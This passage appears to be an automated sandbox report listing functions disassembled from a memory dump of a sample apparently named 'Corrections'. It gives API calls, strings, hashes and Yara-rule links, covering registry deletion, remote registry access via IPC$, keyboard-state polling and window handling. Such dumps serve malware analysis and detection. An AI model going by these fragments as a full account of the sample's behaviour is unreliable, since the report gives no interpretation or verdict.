Opcode Fuzzy Hash: 01eef13bc64f0d6730e883ee7ac2bc118ebb5df1595088ae99b1f6dad785814c
Instruction Fuzzy Hash: 0C61ABB0A1020AAFDF25EFA8D989EEE7BA8FB05358F040155F911A3391D775AD00DB70

Function 0098E4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 0098E4D4
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0098E4FA
_wcslen.LIBCMT ref: 0098E504
_wcsstr.LIBVCRUNTIME ref: 0098E554
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0098E570

Strings

DefaultLangCodepage, xrefs: 0098E5D3
\VarFileInfo\Translation, xrefs: 0098E568
%u.%u.%u.%u, xrefs: 0098E64E
04090000, xrefs: 0098E5A6
StringFileInfo\, xrefs: 0098E543

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: f351fe34393d4cc1073086af8dce813a137fff557bc268d3639db73b5ba4a62a
Instruction ID: 48c814455927e9effd8ceeba0e0098fb8241be6b8a0a79a95051d55977b4072c
Opcode Fuzzy Hash: f351fe34393d4cc1073086af8dce813a137fff557bc268d3639db73b5ba4a62a
Instruction Fuzzy Hash: 4F412372A042147BEB00BBA49D87FFF77ACDFD5720F100129F900A6182FB759A0193A5

Function 009AD694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 009AD6C4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 009AD6ED
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 009AD7A8

Part of subcall function 009AD694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 009AD70A
Part of subcall function 009AD694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 009AD71D
Part of subcall function 009AD694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 009AD72F
Part of subcall function 009AD694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 009AD765
Part of subcall function 009AD694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 009AD788

RegDeleteKeyW.ADVAPI32(?,?), ref: 009AD753

Strings

advapi32.dll, xrefs: 009AD718
RegDeleteKeyExW, xrefs: 009AD729

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: f5d8ca644f9a0ccd093401314a38101f26a69bf176b4eb85d35ec0a97768a774
Instruction ID: d9d72283f572a62b9cd8697ba6351b372a74d1a3a5c5af909921092ae44cd35a
Opcode Fuzzy Hash: f5d8ca644f9a0ccd093401314a38101f26a69bf176b4eb85d35ec0a97768a774
Instruction Fuzzy Hash: E03184B5902129BBD7259B91DC88EFFBB7CEF46710F000165F806E3150EB349E459AE0

Function 0098EFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0098EFCB

Part of subcall function 0093F215: timeGetTime.WINMM(?,?,0098EFEB), ref: 0093F219

Sleep.KERNEL32(0000000A), ref: 0098EFF8
EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 0098F01C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0098F03E
SetActiveWindow.USER32 ref: 0098F05D
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0098F06B
SendMessageW.USER32(00000010,00000000,00000000), ref: 0098F08A
Sleep.KERNEL32(000000FA), ref: 0098F095
IsWindow.USER32 ref: 0098F0A1
EndDialog.USER32(00000000), ref: 0098F0B2

Strings

BUTTON, xrefs: 0098F030

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 42a75e82031a79423a8a9ceb9f215e192370cb8ff6abcd2b97c3a3bd29f572e5
Instruction ID: fb9b3982f384907d4ae6d194d75d935874d954c48c41d93d7f85e22036c77637
Opcode Fuzzy Hash: 42a75e82031a79423a8a9ceb9f215e192370cb8ff6abcd2b97c3a3bd29f572e5
Instruction Fuzzy Hash: 1A219FB5129205BFE7117F60EC9AB367B69EB89B54B205025F501C2372DB798C00FB21

Function 0098F313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0098F374
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0098F38A
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0098F39B
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0098F3AD
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0098F3BE

Strings

play PlayMe, xrefs: 0098F3B9
play PlayMe wait, xrefs: 0098F3A8
alias PlayMe, xrefs: 0098F34D
status PlayMe mode, xrefs: 0098F36F
open , xrefs: 0098F323
close PlayMe, xrefs: 0098F385, 0098F3B2

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 76264f0991e06ce938eb5476cb928b53f62dbd386c6f01814bd3431eaff6e0f0
Instruction ID: 6bb11d17465ea8ee09581f4443d936df2f1462980d9841315cf52173b5aafa74
Opcode Fuzzy Hash: 76264f0991e06ce938eb5476cb928b53f62dbd386c6f01814bd3431eaff6e0f0
Instruction Fuzzy Hash: E2110671A901A879D721B3A2DC5AFFFAB7CEFD1B40F40042A7401E20D1EAA01D04C7B1

Function 0098A958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 0098A9D9
SetKeyboardState.USER32(?), ref: 0098AA44
GetAsyncKeyState.USER32(000000A0), ref: 0098AA64
GetKeyState.USER32(000000A0), ref: 0098AA7B
GetAsyncKeyState.USER32(000000A1), ref: 0098AAAA
GetKeyState.USER32(000000A1), ref: 0098AABB
GetAsyncKeyState.USER32(00000011), ref: 0098AAE7
GetKeyState.USER32(00000011), ref: 0098AAF5
GetAsyncKeyState.USER32(00000012), ref: 0098AB1E
GetKeyState.USER32(00000012), ref: 0098AB2C
GetAsyncKeyState.USER32(0000005B), ref: 0098AB55
GetKeyState.USER32(0000005B), ref: 0098AB63

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: de4f91015fbb9b41b30a54e8f4e455f2e1c35062bc12247cea1f6262a086b816
Instruction ID: 7d16cf9570133d6a9a35d86658dbe1d709eda54db9818428f1cbbadfa3829e58
Opcode Fuzzy Hash: de4f91015fbb9b41b30a54e8f4e455f2e1c35062bc12247cea1f6262a086b816
Instruction Fuzzy Hash: 3851F960A0878429FB35F7A48950BEABFF99F12380F08459BD5C25B7C2DA549B4CC763

Function 0098662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00986649
GetWindowRect.USER32(00000000,?), ref: 00986662
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 009866C0
GetDlgItem.USER32(?,00000002), ref: 009866D0
GetWindowRect.USER32(00000000,?), ref: 009866E2
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00986736
GetDlgItem.USER32(?,000003E9), ref: 00986744
GetWindowRect.USER32(00000000,?), ref: 00986756
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00986798
GetDlgItem.USER32(?,000003EA), ref: 009867AB
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 009867C1
InvalidateRect.USER32(?,00000000,00000001), ref: 009867CE

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 276e8ce052b568ab325b4077a828e8f646efbaaff1bfc83b7b2504ed3da14c30
Instruction ID: 7ee6c90c85c85391dda8b089e1819fc2769f1e24a5407d55385165c3e5da642b
Opcode Fuzzy Hash: 276e8ce052b568ab325b4077a828e8f646efbaaff1bfc83b7b2504ed3da14c30
Instruction Fuzzy Hash: C75121B1B11205AFDF18DF68DD89AAE7BB9FB48315F108229F515E7290E7709D04CB90

Function 0092146D Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00921802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00921488,?,00000000,?,?,?,?,0092145A,00000000,?), ref: 00921865

DestroyWindow.USER32(?), ref: 00921521
KillTimer.USER32(00000000,?,?,?,?,0092145A,00000000,?), ref: 009215BB
DestroyAcceleratorTable.USER32(00000000), ref: 009629B4
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,0092145A,00000000,?), ref: 009629E2
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,0092145A,00000000,?), ref: 009629F9
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0092145A,00000000), ref: 00962A15
DeleteObject.GDI32(00000000), ref: 00962A27

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: f3a40b9f91b28cd2c8ef39ca69b361a3d823d6de3a52f6392ff46c37728c5905
Instruction ID: ced4ea168f5c5c6182ebcc3b037005b307c60bd29289634307e5cfcdd1a4c68b
Opcode Fuzzy Hash: f3a40b9f91b28cd2c8ef39ca69b361a3d823d6de3a52f6392ff46c37728c5905
Instruction Fuzzy Hash: B761AC3051AB25DFCB359F14EA48B3977B5FF90322F208518E443876B4C7B4A9A0EB80

Function 00922128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00922234: GetWindowLongW.USER32(?,000000EB), ref: 00922242

GetSysColor.USER32(0000000F), ref: 00922152

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: d168c77b8f7960f13c2dad6cde2d660955f66506179c72be795956c83e4aa429
Instruction ID: be0e9751c900365f41f9d14bcd3477b015a1617d59e5740e4384005267806814
Opcode Fuzzy Hash: d168c77b8f7960f13c2dad6cde2d660955f66506179c72be795956c83e4aa429
Instruction Fuzzy Hash: B441D231109664BFDB245F38EC49FB93769AB42330F144719FAA28B2E6D7319D52EB10

Function 0098A05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00970D31,00000001,0000138C,00000001,00000000,00000001,?,0099EEAE,009F2430), ref: 0098A091
LoadStringW.USER32(00000000,?,00970D31,00000001), ref: 0098A09A

Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00970D31,00000001,0000138C,00000001,00000000,00000001,?,0099EEAE,009F2430,?), ref: 0098A0BC
LoadStringW.USER32(00000000,?,00970D31,00000001), ref: 0098A0BF
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0098A1E0

Strings

^ ERROR, xrefs: 0098A175
Line %d (File "%s"):, xrefs: 0098A109
Line %d:, xrefs: 0098A11A
Error: , xrefs: 0098A197
%s (%d) : ==> %s: %s %s, xrefs: 0098A1C4

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 3eb2bf00e3a542abd8e037ee5f2dfcc277762d0bba09b35d268173cb05336a2d
Instruction ID: 28fa82af207bfdb46735b2359a66014fb8783201eb99252148f383a763b9e38d
Opcode Fuzzy Hash: 3eb2bf00e3a542abd8e037ee5f2dfcc277762d0bba09b35d268173cb05336a2d
Instruction Fuzzy Hash: 35418372804219AADF05FBE0ED46FEEB778AF98340F500065F505B2196EB356F49CB61

Function 00980FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00928577: _wcslen.LIBCMT ref: 0092858A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00981093
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009810AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009810CB
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 009810F5
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0098111D
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00981128
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0098112D

Strings

SOFTWARE\Classes\, xrefs: 00980FFF
\IPC$, xrefs: 00981075
\CLSID, xrefs: 00981015

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 9b962f6a725f92603f312e927188680b8a3ccb7ea8c678b6b451100a9d195d83
Instruction ID: 53a48cd070688692c94f034b375ca53fb57b76073fa3bb76c2fa7b54ed9aac7a
Opcode Fuzzy Hash: 9b962f6a725f92603f312e927188680b8a3ccb7ea8c678b6b451100a9d195d83
Instruction Fuzzy Hash: 30410872C14229ABCF11EFA4EC85DEEB7B8BF54750F004169F905A32A5EB319E05CB50

Function 009B4A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 009B4AD9
CreateCompatibleDC.GDI32(00000000), ref: 009B4AE0
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 009B4AF3
SelectObject.GDI32(00000000,00000000), ref: 009B4AFB
GetPixel.GDI32(00000000,00000000,00000000), ref: 009B4B06
DeleteDC.GDI32(00000000), ref: 009B4B10
GetWindowLongW.USER32(?,000000EC), ref: 009B4B1A
SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 009B4B30
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 009B4B3C

Strings

static, xrefs: 009B4A71

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 96cf4cff1e36bb700b03ed25338f32c8f1e58b169e74bcdfdbcfb6fb3505a8ae
Instruction ID: ef3e1a76143e21421d37e48b4dc1fa5bbc598025edacbe3c0e132279ce7f24d7
Opcode Fuzzy Hash: 96cf4cff1e36bb700b03ed25338f32c8f1e58b169e74bcdfdbcfb6fb3505a8ae
Instruction Fuzzy Hash: 46316932115219ABDF119FA4DE08FDA3BADFF09374F110315FA14A61A0D735D850EB94

Function 009A468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 009A46B9
CoInitialize.OLE32(00000000), ref: 009A46E7
CoUninitialize.OLE32 ref: 009A46F1
_wcslen.LIBCMT ref: 009A478A
GetRunningObjectTable.OLE32(00000000,?), ref: 009A480E
SetErrorMode.KERNEL32(00000001,00000029), ref: 009A4932
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 009A496B
CoGetObject.OLE32(?,00000000,009C0B64,?), ref: 009A498A
SetErrorMode.KERNEL32(00000000), ref: 009A499D
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 009A4A21
VariantClear.OLEAUT32(?), ref: 009A4A35

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 9d3625cfc0d3ba792c3438069e9ec210c4b4b4c38274135b3f90e91876071e80
Instruction ID: a18bf0491aa9023cb09663805973e79311cc72a3ce26e09a6c551d483ed6842d
Opcode Fuzzy Hash: 9d3625cfc0d3ba792c3438069e9ec210c4b4b4c38274135b3f90e91876071e80
Instruction Fuzzy Hash: A4C113716083059F9700DF68C884A2BB7E9FFCA758F10492DF9899B260DB71ED45CB92

Function 009984DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00998538
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009985D4
SHGetDesktopFolder.SHELL32(?), ref: 009985E8
CoCreateInstance.OLE32(009C0CD4,00000000,00000001,009E7E8C,?), ref: 00998634
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009986B9
CoTaskMemFree.OLE32(?,?), ref: 00998711
SHBrowseForFolderW.SHELL32(?), ref: 0099879C
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009987BF
CoTaskMemFree.OLE32(00000000), ref: 009987C6
CoTaskMemFree.OLE32(00000000), ref: 0099881B
CoUninitialize.OLE32 ref: 00998821

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: bade1eb27d52c26763368bdc002c98416477222f1d708a2e2e83ba23aa4986e7
Instruction ID: 54c10e689bc306fdf547b79489819349a6005aebab9378f4f453642b04dc5130
Opcode Fuzzy Hash: bade1eb27d52c26763368bdc002c98416477222f1d708a2e2e83ba23aa4986e7
Instruction Fuzzy Hash: 67C13B75A00119AFCB14DFA8C888DAEBBF9FF49314B148599F419DB261DB30EE45CB90

Function 00980378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0098039F
SafeArrayAllocData.OLEAUT32(?), ref: 009803F8
VariantInit.OLEAUT32(?), ref: 0098040A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0098042A
VariantCopy.OLEAUT32(?,?), ref: 0098047D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00980491
VariantClear.OLEAUT32(?), ref: 009804A6
SafeArrayDestroyData.OLEAUT32(?), ref: 009804B3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009804BC
VariantClear.OLEAUT32(?), ref: 009804CE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009804D9

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
